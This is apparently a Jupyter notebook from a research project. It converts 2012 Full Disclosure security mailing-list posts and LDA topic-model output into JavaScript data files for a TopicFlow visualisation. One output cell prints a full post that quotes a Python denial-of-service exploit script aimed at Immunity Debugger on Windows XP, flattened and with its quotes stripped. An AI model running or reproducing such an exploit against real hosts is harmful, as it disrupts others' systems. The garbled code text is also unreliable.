In [103]:
import numpy as np
import pandas as pd
import json

pd.set_option('display.max_columns',9999)

Data Transformation

Test on 2012 data

Tweet.js


In [448]:
# monthList = ['Apr', 'May']
monthList = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']

In [449]:
# load metadata of April & May
# notice the encoding 'cp1252' (Western Europe)

# stores DataFrame of every month in monthList
dfList = []

for month in monthList:
    dfList.append(pd.read_csv(r"E:\GoogleDrive\Projects\PERCEIVE\data\Full Disclosure\2012 - Copy\Full_Disclosure_Mailing_List_" + month + "2012.csv",
                              encoding = 'cp1252',
                              index_col= 0)
                 )

In [450]:
# initiate four elements of Tweets.js
tweet_id = None
author = []
tweet_date = []
text = []

# tweet_id
Len = 0
for month_ix in range(len(monthList)):
    Len += len(dfList[month_ix])
tweet_id = list(range(1,Len+1))

# author
for month_ix in range(len(monthList)):
    author += dfList[month_ix].author.apply(lambda x: x.replace('"','')).tolist()

# tweet_date
for month_ix in range(len(monthList)):
    tweet_date += pd.to_datetime(dfList[month_ix].dateStamp).apply(lambda x: str(x.month) + '/' + str(x.day) + '/' + str(x.year) + ' ' + str(x.hour) + ':' + str(x.minute)).tolist()

# text
for month_ix in range(len(monthList)):
    M = dfList[month_ix]
    for text_ix in range(len(M)):
        ix = str(M['k'].values[text_ix]) # 'k' points to the name of the file
        with open(r'E:\GoogleDrive\Projects\PERCEIVE\data\Full Disclosure\2012 - Copy\2012_' + monthList[month_ix] + '_' + ix + '.txt', 'r', encoding='cp1252') as textfile:
            tmp = textfile.read().replace('"','').replace('http://','').replace('\\','').replace('\n','')
        text.append(tmp)
# text - TEST VERSION
# for month_ix in range(len(monthList)):
#     M = dfList[month_ix]
#     for text_ix in range(len(M)):
#         text.append('tmp')

There are a lot of characters or symbols that could cause problems


In [411]:
text[0]


Out[411]:
"-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1Windows XP denial of service 0day found in CTF exerciseOof, this is almost as bad as that BackTrack 0 day released the other day (http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/).  Any response from Microsoft yet?  Justin C. Klein Keane http://www.MadIrish.net  The PGP signature on this email can be verified using the public key at http://www.madirish.net/gpgkey  On 04/17/2012 02:48 AM, Adam Behnke wrote:Immunity Debugger Remote Denial of Service 0Day Tested against version 1.76 and 1.80 on Windows XP distributions  Has not been tested for potential privilege escalation vectors.  We first wrote about Immunity Debugger here: http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/   Discovered by a student that wishes to remain anonymous in the course CTF. This 0day exploit for Windows was discovered by a student in the InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The student wishes to remain anonymous, he has contributed a python version of the 0day. A patch that can be applied to Windows has not been made available. You can find a python version of the exploit to copy and paste here:   #!/usr/bin/python #Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student #For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.htmlimport sysimport os import time import getopt import socket  class Error(Exception): def __init__(self, error):  self.errorStr=error  def __str__(self): return repr(self.errorStr)  class Exploit():  def __init__(self, targetHost, targetPort): self.targetHost = targetHost  def exploit(self, targetHost, targetPort):  try: socket.inet_aton(targetHost) s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.connect((targetHost,targetPort)) except socket.error: raise Error(Unable to exploit (Connect failed.)) sys.exit(0)  # exploit try: s.sendto(\\n\\n\\n, (targetHost, targetPort))  except: raise Error(Unable to exploit (Exploit failed.))   def usage(): print [!] Usage: print        ( -h, --help ): print  Print this message. print   ( --targetHost= ): Target host. print              --targetHost=127.0.0.1 print  ( --targetPort= ): Target port. print                 --targetPort=8888  def main(): print [$] Windows XP 0Day try: opts, args = getopt.getopt(sys.argv[1:], h, [help, targetHost=, targetPort=]) except getopt.GetoptError, err: # Print help information and exit: print '[!] Parameter error:'   str(err) # Will print something like option -a not recognized usage()  sys.exit(0)  targetHost=None targetPort=None  for opt, arg in opts: if opt in (-h, --help): usage() sys.exit(0) elif opt ==--targetHost:  targetHost=arg elif opt ==--targetPort: targetPort=arg else: # I would be assuming to say we'll never get here. print [!] Parameter error. usage() sys.exit(0)  if not targetHost: print [!] Parameter error: targetHost not set. usage() sys.exit(0)  if not targetPort: print [!] Parameter error: targetPort not set. usage() sys.exit(0)  exploit = Exploit(targetHost, targetPort)  print [*] Attempting to exploit:  try:  exploit.exploit(targetHost, int(targetPort)) except Error as error: print [!] Exploit Error: %s % (error.errorStr) exit(0)  print [*] Exploit appears to have worked.  # Standard boilerplate to call the main() function to begin # the program. if __name__=='__main__': main()    _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/  iPwEAQECAAYFAk NYXEACgkQkSlsbLsN1gBiggb/efTTww5szr9rcI NbsUzybuk rhPyvj99VJMMVCUjHrDrWKXQeTD/rrorY3SYMIGNlHzVWgqkiswM5N16Fy9MvqIH 2Cc8aJ5kh2xi9vtlCHlPZ7XJeN3tPEL 8/qOVbT7I2CNeD8JJseVfcJwnoEyyumm SZYmoxjJriMT7IAXysHJudaF294DvC z6drvF ou8wnVcIB0nkXoCVNsbcDK9dwS R4f0a QYN1tXM7 8za6/VznbDwcqw/amqeS3V883lqlt0XCHx5zIh VxG0qvB5Ui EPjoh3P/OEMP7PYRozM= =y j6 -----END PGP SIGNATURE-----  _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/\n"

In [452]:
# transform into json format
# first, transform into pd.DataFrame
df_tmp = pd.DataFrame({'tweet_id':tweet_id, 'author':author, 'tweet_date': tweet_date, 'text': text},
                      columns=['tweet_id','author','tweet_date','text'],
                      index=tweet_id)

# then, transform into json format
json_tmp = df_tmp.to_json(orient='index')

# finally, transform into .js format that TopicFlow can read
prefix = 'function populate_tweets_test(){\nvar tweet_data ='
posfix = ';\nreadTweetJSON(tweet_data);\n}'

tweetsJS = prefix + json_tmp + posfix

In [453]:
def get_tweets(month_abre):
    pass

In [454]:
# write

with open('Tweet.js', 'w') as file:
    file.write(tweetsJS)

Bins.js


In [473]:
# initiate bins, each month is one bin, each bin is also a dictionary
binDict = {}
for month_ix in range(len(monthList)):
    binDict[str(month_ix)] = {}

! May want to see if the order in the dict matters


In [474]:
# bin_id
for month_ix in range(len(monthList)):
    binDict[str(month_ix)]['bin_id'] = month_ix

# tweet_ids
# needs input from dfList, specifically the lenth of each month
for month_ix in range(len(monthList)):
    binDict[str(month_ix)]['tweet_Ids'] = []

lo,hi = 1,1
for month_ix in range(len(monthList)):
    hi += len(dfList[month_ix])
    for tweet_ix in range(lo,hi):
        binDict[str(month_ix)]['tweet_Ids'].append(tweet_ix)
    lo = hi

# start_time
# needs input from dfList, specifically the lenth of each month
for month_ix in range(len(monthList)):
    binDict[str(month_ix)]['start_time'] = pd.to_datetime(dfList[month_ix].dateStamp).sort_values().apply(lambda x: str(x.month) + '/' + str(x.day) + '/' + str(x.year) + ' ' + str(x.hour) + ':' + str(x.minute)).tolist()[0]

# end_time
# needs input from dfList, specifically the lenth of each month
for month_ix in range(len(monthList)):
    binDict[str(month_ix)]['end_time'] = pd.to_datetime(dfList[month_ix].dateStamp).sort_values().apply(lambda x: str(x.month) + '/' + str(x.day) + '/' + str(x.year) + ' ' + str(x.hour) + ':' + str(x.minute)).tolist()[-1]

# initiate topic_model
for month_ix in range(len(monthList)):
    binDict[str(month_ix)]['topic_model'] = {}
    # 4 sub dictionaries
    binDict[str(month_ix)]['topic_model']['topic_doc'] = {}
    binDict[str(month_ix)]['topic_model']['doc_topic'] = {}
    binDict[str(month_ix)]['topic_model']['topic_word'] = {}
    binDict[str(month_ix)]['topic_model']['topic_prob'] = {}

! notice that here len(Topic-Doc matrix) != len(previous Ids)


In [475]:
# read topic-doc & topic-word data sets
dfTopicDoc = []

for month in monthList:
    dfTopicDoc.append(pd.read_csv(r"E:\GoogleDrive\Projects\PERCEIVE\data\LDA_VEM\2012_k_10_12\Document_topic_Matrix\\" + month + ".csv",
                                  index_col= 0)
                     )
    
# read topic-word data sets
dfTopicWord = []
for month in monthList:
    dfTopicWord.append(pd.read_csv(r"E:\GoogleDrive\Projects\PERCEIVE\data\LDA_VEM\2012_k_10_12\Topic_Term_Matrix\\" + month + ".csv",
                                  index_col= 0)
                      )

In [476]:
# initiate topic_model
for month_ix in range(len(monthList)):
    binDict[str(month_ix)]['topic_model'] = {}
    # 4 sub dictionaries
    binDict[str(month_ix)]['topic_model']['topic_doc'] = {}
    binDict[str(month_ix)]['topic_model']['doc_topic'] = {}
    binDict[str(month_ix)]['topic_model']['topic_word'] = {}
    binDict[str(month_ix)]['topic_model']['topic_prob'] = {}

In [477]:
# to begin this section, create a DataFrame mapping Topic-Doc, the documents in the dfTopicDoc are not the same as in metadata
# pre-step 1, creates a list of the starting position of each month's tweet_id
month_start_tweetIds = []
Len = 0
for month_ix in range(len(monthList)):
    month_start_tweetIds.append(Len)
    Len += len(dfList[month_ix])

# pre-step 2, find the overlapping documents
for month_ix in range(len(monthList)):
    Doc_dfTopicDoc = []
    for i in dfTopicDoc[month_ix].index.values:
        Doc_dfTopicDoc.append(int(i[13:-4]))
    Overlap = set(Doc_dfTopicDoc) & set(dfList[month_ix]['k'].values)
    
    # pre-step 3, create a DataFrame mapping the overlapping documents and 10 topics
    Overlap_ix = []
    ix_list = dfTopicDoc[month_ix].index.tolist()
    for item in Overlap:
        name = str(monthList[month_ix]) + '/2012_' + str(monthList[month_ix]) + '_' + str(item) + '.txt'
        Overlap_ix.append(ix_list.index(name))
    dfTopicDoc_Overlap = dfTopicDoc[month_ix].iloc[Overlap_ix, : ]
    
    # pre-step 4, add tweet_ids to dfTopicDoc_Overlap
    Overlap_tweetIds = []
    for k in dfTopicDoc_Overlap.index.values:
        name = int(k[13:-4])
        name_ix = dfList[month_ix]['k'].tolist().index(name) + 1
        name_ix += month_start_tweetIds[month_ix]
        Overlap_tweetIds.append(name_ix)
    dfTopicDoc_Overlap['tweet_id'] = Overlap_tweetIds

    # topic_prob
    # is there an order?
    L = len(dfTopicDoc[month_ix].columns)
    for ix in range(L):
        T = str(month_ix) + '_' + str(ix+1)
        binDict[str(month_ix)]['topic_model']['topic_prob'][str(ix)] = T
    
    # topic_doc
    # create 10 topic keys
    for ix in range(L):
        T = str(month_ix) + '_' + str(ix+1)
        binDict[str(month_ix)]['topic_model']['topic_doc'][T] = {}
    # add doc values to these keys
    for ix_2 in range(L):
        T = str(month_ix) + '_' + str(ix_2+1)
        col_score = dfTopicDoc_Overlap[str(ix_2+1)].values
        col_k = dfTopicDoc_Overlap['tweet_id'].values
        for ix_3 in range(len(col_score)):
            binDict[str(month_ix)]['topic_model']['topic_doc'][T][str(col_k[ix_3])] = col_score[ix_3]

    # doc_topic
    for ix_4 in range(len(dfTopicDoc_Overlap)):
        row_score = dfTopicDoc_Overlap.iloc[ix_4,:]
        binDict[str(month_ix)]['topic_model']['doc_topic'][ str(int(row_score['tweet_id'])) ] = {}
        for ix_5 in range(L):
            name = str(month_ix) + '_' + str(ix_5 + 1)
            binDict[str(month_ix)]['topic_model']['doc_topic'][ str(int(row_score['tweet_id'])) ][name] = row_score[ix_5]

    # topic_word
    for ix_6 in range(L):
        name = str(month_ix) + '_' + str(ix_6 + 1)
        binDict[str(month_ix)]['topic_model']['topic_word'][name] = {}
        topwords = dfTopicWord[month_ix].iloc[ix_6].sort_values(ascending=False)[:10]
        # we choose top 10 words, so below the range is 10
        for ix_7 in range(10):
            binDict[str(month_ix)]['topic_model']['topic_word'][name][topwords.index[ix_7]] = topwords.values[ix_7]


C:\Anaconda3\lib\site-packages\ipykernel_launcher.py:31: SettingWithCopyWarning: 
A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead

See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy

In [478]:
# transform into json format

# then, transform into json format
json_tmp = json.dumps(binDict)

# finally, transform into .js format that TopicFlow can read
prefix = 'function populate_bins_test(){\nvar bin_data = '
posfix = ';\nreadBinJSON(bin_data);\n}'

BinsJS = prefix + json_tmp + posfix

In [479]:
# write

with open('Bins.js', 'w') as file:
    file.write(BinsJS)

TopicSimilarity.js


In [462]:
# read data set
dfTopicSim = pd.read_csv(r"E:\GoogleDrive\Projects\PERCEIVE\data\LDA_VEM\2012_k_10_12\Topic_Flow\topic_flow.csv")

# simDict
simDict = {}

# put topics into nodes, record their orders
nodes = []
for i in range(len(monthList)):
    for j in range(1,11):
        tmp = {}
        name = str(i) + '_' + str(j)
        value = np.random.randint(1,20) # I haven't figured out what this value means, so right now keep it random
        tmp['name'], tmp['value'] = name, value
        nodes.append(tmp)

# put source, target, value into links
links = []
for month_ix in range(len(monthList) - 1):
    # get unique pais btw/ every two month, in this test, Apr and May
    mm1, mm2 = monthList[month_ix], monthList[month_ix + 1]
    sim = mm1 + '_' + mm2 + '_similarity'
    df_tmp = dfTopicSim[[mm1, mm2, sim]].dropna(axis=0).drop_duplicates()
    for row_ix in range(len(df_tmp)):
        source = month_ix*10 + int(df_tmp[mm1].values[row_ix]) - 1
        target = (month_ix+1)*10 + int(df_tmp[mm2].values[row_ix]) - 1
        score = df_tmp[sim].values[row_ix] * 500 # I don't know how they came up with the values
        link_tmp = {}
        link_tmp['source'], link_tmp['target'], link_tmp['value'] = source, target, score
        links.append(link_tmp)
        
# put two lists into simDict
simDict['nodes'], simDict['links'] = nodes, links

In [463]:
# transform into json format

# then, transform into json format
json_tmp = json.dumps(simDict)

# finally, transform into .js format that TopicFlow can read
prefix = 'function populate_similarity_test(){\nvar sim_data = '
posfix = ';\nreadSimilarityJSON(sim_data);\n}'

TopicSimilarityJS = prefix + json_tmp + posfix

In [465]:
# write

with open('TopicSimilarity.js', 'w') as file:
    file.write(TopicSimilarityJS)